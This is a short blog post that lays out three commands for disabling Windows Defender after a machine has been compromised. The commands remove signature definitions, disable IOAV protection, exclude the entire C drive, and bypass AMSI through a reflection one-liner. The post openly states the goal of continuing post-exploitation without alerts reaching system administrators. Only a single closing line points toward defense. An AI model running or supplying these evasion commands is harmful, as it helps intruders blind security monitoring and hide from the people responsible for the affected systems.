Skip to content

Bypassing Windows Defender On Post-Exploitation

So you were able to exploit a Windows box but now you have to deal with Windows Defender on that system. Before you can load your tools for further post exploitation, Defender must be dealt with. Here is 3 simple commands that will disable it, mitigate the possibility of it starting back up and bypass the Window’s Antimalware Scan Interface from discovering malicious script payloads.

  1. Disable Windows Defender and delete current signature list
"c:\Program Files\Windows Defender\mpcmdrun.exe" -RemoveDefinitions -All Set-MpPreference -DisableIOAVProtection $true

2. Exclude the C drive in case Windows Defender starts back up.

Add-MpPreference -ExclusionPath "C:\"

3. Bypass Window’s AMSI to thwart malicious script detection

[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic, Static').SetValue($null, $true)

Now you should have free reign to continue your post exploitation without the possibility of Defender sending alerts back to system administrators via virus/malware detection. As it is this easy to thwart Defender once admin credentials have been obtained, it is a very good idea to seek a different AV to defend your network.

I have been programming for 7 years with over 10 years of systems administration. This is my blog to write about technology, current events, code, spread awareness, rant and rave and write the wrongs of the past. I am into new technology, programming, archery, turntablism, disc golf and rally racing.

Comments are closed.